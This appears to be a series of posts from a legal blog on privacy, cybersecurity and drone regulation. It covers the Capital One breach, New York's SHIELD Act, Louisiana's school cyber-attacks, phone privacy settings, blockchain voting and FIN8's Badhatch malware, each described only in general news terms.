$7.75 Million Grant Awarded to Drone Companies for Drone Traffic Management

Two New York drone companies, AX Enterprize and Thales USA, were awarded a $7.75 million grant from the U.S. Air Force Research Lab to develop state-of-the-art air traffic management (ATM) systems to would allow civilian and military drones to safely coexist alongside manned aircraft in the national airspace. The project and research will be conducted at the Griffiss UAS Test Site in Rome, New York in collaboration with NUAIR, Scherzi Systems LLC and Syracuse University’s Center for Advanced Systems and Engineering and Autonomous Systems Policy Institute.

The goal of this project is to develop a system in which drone pilots can safely detect and avoid other air traffic, and to create a policy approach for data exchange models using high-definition air traffic surveillance and ground-based sense-and-avoid radar technology. This project and the research and results it yields will hopefully be a huge step forward for implementing drones safely and effectively in the national airspace.

Privacy Tip #202 – Check the Privacy Settings on Your Phone Frequently

I once again had the pleasure of presenting Cybersecurity for Tax Professionals at the IRS Nationwide Tax Forum today. The conference is designed for tax professionals in small- to medium-sized businesses. It is always a lively bunch, but following the afternoon session, a crowd of folks got in line to chat more, and they were most interested in my discussion of the privacy settings on their phones and how to find out who they have allowed to have access to their camera, microphone, location services, fitness tracking, bluetooth, etc.

Mind you, they were interested in learning more, despite the fact that I was between them and the cocktail hour in New Orleans.

While chatting with them about how to check their privacy settings and help them better understand the apps they have allowed access to these capabilities, one man mentioned that he didn’t understand why or how his privacy settings appear to reset after a period of time to allow access.

This point is an important one, and it gave me the idea for the Privacy Tip this week. Why do our Privacy settings revert to previously selected or default settings when we haven’t changed them? This has happened to me, and I am suspicious about how and why it happens. I have considered two possibilities.

Perhaps we may have used an app and needed to turn the access back on in order to do so, and then have forgotten to turn it off. That is certainly plausible. But there have also been times when I have turned my phone off, and my privacy settings mysteriously have reverted to their default settings, and I have to change them all back to not allowing access. Or perhaps when we are asked by the manufacturer to upload a new operating system, in order to patch vulnerabilities, the privacy settings automatically revert to default settings.

The tip for this week is to check your privacy settings frequently and reset them. If you upload to a new version of the operating system, as soon as you open the phone after the upload, go into privacy settings and reset them.  Do the same on your smart TVs and other IoT devices. Check your privacy settings frequently so that if, for whatever reason, they have reverted to the default settings, you can affirmatively choose who you want to have access to your camera, location, microphone and contacts.

Utah to Test Blockchain Voting Through Mobile Apps

As we head toward 2020, expect significant public debate relating to smartphone applications designed to increase turnout and participation in upcoming elections. The Democratic Party has dipped its toe in the water, announcing in July plans to allow telephone voting in lieu of appearing for neighborhood caucus meetings in the key early primary states of Iowa and Nevada.

Given concerns regarding security and reliability of submitting votes over the internet, jurisdictions around the country have begun to test solutions involving blockchain technology to allow absentee voters to submit voting ballots. Following initial pilot programs in Denver and West Virginia, Utah County, Utah will be the next jurisdiction to utilize a blockchain-based mobile in connection with its upcoming municipal primary and general elections.

The pilot program, which will utilize the mobile voting application “Voatz”, will allow active duty military, their eligible dependents, and overseas voters to cast absentee ballots. Eligible voters will need to apply for an absentee ballot with the county clerk and then download the mobile application. The ballot itself will be unlocked using the smartphone’s biometric data (i.e., a fingerprint or facial recognition) and then will be distributed into the blockchain framework for tabulation.

Louisiana Governor Declares Statewide Emergency After Cyber-Attacks Against School Systems

Louisiana Governor John Bel Edwards, for the first time in history, declared a statewide cybersecurity emergency last week, following cyber-attacks against several school systems in the state.

By declaring a cybersecurity emergency, the state is able to garner needed resources, including cybersecurity experts from the Louisiana National Guard, State Police, the Office of Technology Services, the Governor’s Office of Homeland Security and Emergency Preparedness, Louisiana State University, and others to assist school systems in Sabine, Morehouse and Oachita parishes that were compromised with malware attacks.

According to the Governor’s office, although these resources are working on the incident, the threat is ongoing. The Governor established a statewide Cyber Security Commission in 2017 and stated that these incidents against school systems in the State are the reason the Commission was established.

Several states, but not all, have established Cyber Security Commissions or similar public-private partnerships in order to prepare for and respond to cyber-attacks that affect state resources. Setting up the Commission in advance of attacks like the ones that occurred in Louisiana will assist states in responding quickly to these attacks and provide appropriate resources and help to those affected.

New York Governor Signs Bill Expanding Data Breach Notification Law

New York Governor Andrew M. Cuomo signed a bill into law last week that expands New York’s data breach notification law. The Stop Hacks and Improve Electronic Data Security (SHIELD) Act brings the New York data breach notification law on par with other state data breach notification laws that have been amended in the last year or so.

The SHIELD Act expands the definition of personal information to include biometric information as well as email addresses in combination with a password or security questions and answers. The law also expands the definition of a data breach to include unauthorized access to personal information, in addition to an unauthorized use or disclosure.

The law now applies to any person or company that owns or licenses personal information of a New York resident, not just entities conducting business in the state.

The law allows companies to conduct a risk-of-harm analysis in the event of an inadvertent disclosure, which must be documented in writing. If a company determines that notice is not required because the risk assessment concludes that the access or disclosure will not likely result in the misuse of data or financial or emotional harm to the individual. If the incident involves more than 500 New York residents, the written determination must be provided to the New York Attorney General within 10 days of the determination. If the entity fails to notify the individual, the law increases civil penalties to the greater of $5,000 or $20 per record, with a cap of $250,000.

Finally, the law includes data security requirements that companies must put in place, consistent with other state laws. Companies must implement and maintain administrative, technical and physical safeguards to protect and dispose of personal information. This is similar to the requirements of Massachusetts, Rhode Island and Oregon, which require businesses to have a Written Information Security Program, also known as a WISP, to be in place.

The security requirements go into effect on March 21, 2020, with the rest of the provisions taking effect on October 23, 2019. It is a good time to determine whether your business has a WISP in place and to implement one if not.

Pay Attention to Your Firewalls

After the Capital One data breach, which was reportedly caused by an improperly configured firewall, every company should be paying attention to its firewalls.

This is not the first data breach that has occurred because a firewall was not properly in place for data stored in the Cloud. I’m a lawyer, and I know very little about the technical components of a firewall, but I do know how important they are for protecting the perimeter of your network, and that a firewall is a critical part of a security program meant to protect data.

When we do post-mortems after security incidents and data breaches, there are always lessons to be learned and ways to improve one’s security posture. Let’s all learn from the Capital One incident and pay attention and check our firewalls as a short-term priority.

Eerily, this type of breach was predicted earlier this year by Security Metrics in its publication Security Trends: Data Breach Statistics From 2018 and Predictions for 2019, which predicted that data stored in the Cloud would be breached. It also reported that a top organizational vulnerability is the firewall, and that an improperly configured firewall is “most common.” Check out Security Metrics’ take on trends and predictions here.

To read more about common firewall configuration mistakes, check out this article by our friends at Dark Reading. And remember it’s the beginning of a new month. Make August “Firewalls Priority Month.”

FAA Expands Drone Operations for Recreational Operators

As of July 23, 2019, the Federal Aviation Administration (FAA) expanded the Low Altitude Authorization and Capability (LAANC) system to include recreational operators. LAANC is a system built as a collaboration between the FAA and industry stakeholders to help expedite the time it takes to receive authorization to fly a drone under 400 feet in controlled airspace.

LAANC systems allow air traffic professionals more visibility into where authorized drones are flying near airports and increase safe operation in the national airspace. This new expansion will allow increased drone pilots’ access to operate more efficiently and safely in controlled airspace.

For updates and more information on LAANC, click here.

OSHA’s Drone Initiative

The Occupational Safety and Health Administration’s (OSHA) drone initiative has taken off. What does that mean for your company? Currently, OSHA can only use drones for inspection activities with permission from employers. However, that could leave you in an uncomfortable position if you deny OSHA’s request to use a drone for its inspection. How should you then handle it? If an employer allows OSHA to use drones for its inspection, the employer should be involved from the very beginning –the employer should assist with the development of the flight plan, designate the visual observer, and get a written agreement from OSHA that all data and photographs collected by the drone will be shared with the company.

In 2018, OSHA used drones with cameras to conduct at least nine inspections of employer facilities, mainly in conditions that were otherwise dangerous for the inspector. The use of drones for this purpose has continued this year, and the use of drones for these OSHA inspections will likely continue to increase, which will raise some novel issues for employers.

Privacy Tip #201 – Capital One Suffers Massive Data Breach

Many readers have reached out to learn about the Capital One data breach and how it affects us. If you haven’t been watching the story unfold as closely as I have, here is a summary of what happened, what information was included, and what to do about it.

Capital One announced on July 29 that a hacker gained access to the personal information of approximately 106 million credit card holders and applicants which was stored with a Cloud provider, which included some 140,000 Social Security numbers, about 1 million Canadian Social Insurance numbers, and 80,000 bank account numbers, with the largest category of information accessed being “consumers and small businesses as of the time they applied for one of our credit card products from 2005 through early 2019,” according to Capital One. The access was allegedly through an improperly configured firewall.

The consumers and small businesses information accessed through this data breach included names, addresses, telephone numbers, dates of birth, reported income, credit scores, credit limits, balances, payment history, and email addresses.

The company is offering free credit monitoring and identity protection services for those affected. The problem that I am hearing from readers is, unless you have a Capital One credit card right now, how do you remember if you had one in the past, or if you ever filled out an application (since 2005), or if Capital One had your data as a result of data sharing that is allowed by the Gramm-Leach-Bliley Act?

For those of you who have a Capital One credit card, you should assume that your information was breached and take appropriate precautions, including putting a credit freeze on your credit account, closing your credit card account, and watching your statements closely, to name a few. For those of you who aren’t sure, the same measures are good cyber-hygiene to protect yourself from fraud or identity theft.

Capital One has been sued in class action lawsuits and is the subject of several State Attorneys General investigations. The Department of Justice has arrested a suspect in Seattle.

FIN8 Back in Business Stealing Credit Card Information with Badhatch

Security research firm Gigamon has reported that the nasty cybercriminal group FIN8 may have reappeared in June after a two year silence. FIN8 is known for implementing malware on point of sale systems to steal credit card information and selling it on the dark web.

FIN8 appears to be back in business with a new twist on its old scheme. Dubbed “Badhatch,” the malware attack starts with customized phishing emails which deliver a malicious Microsoft Word document containing PowerShell scripts. The phishing email includes macros that users are asked to open. When the scripts are executed by FIN8, a backdoor is installed that allows FIN8 more control over the user’s system, to distribute tools to steal credit card information, such as a credit card scraper malware, which steals details of cards swiped through POS systems.

The researchers at Gigamon have outlined Badhatch from a technical standpoint, which is helpful for security folks.

Luckily, according to Gigamon, “[A]t the end of the day, the actors behind FIN8 are human and clearly fallible. While they may make rapid improvements to tools and procedures, we hope the technical and operational information shared here will help other organizations detect and disrupt FIN8 operations.”

Badhatch is designed to steal credit card information, and our experience has seen a dramatic rise in credit card scraping schemes. Those in the retail space may wish to consider taking a look at the research from Gigamon and being on the look-out for Badhatch.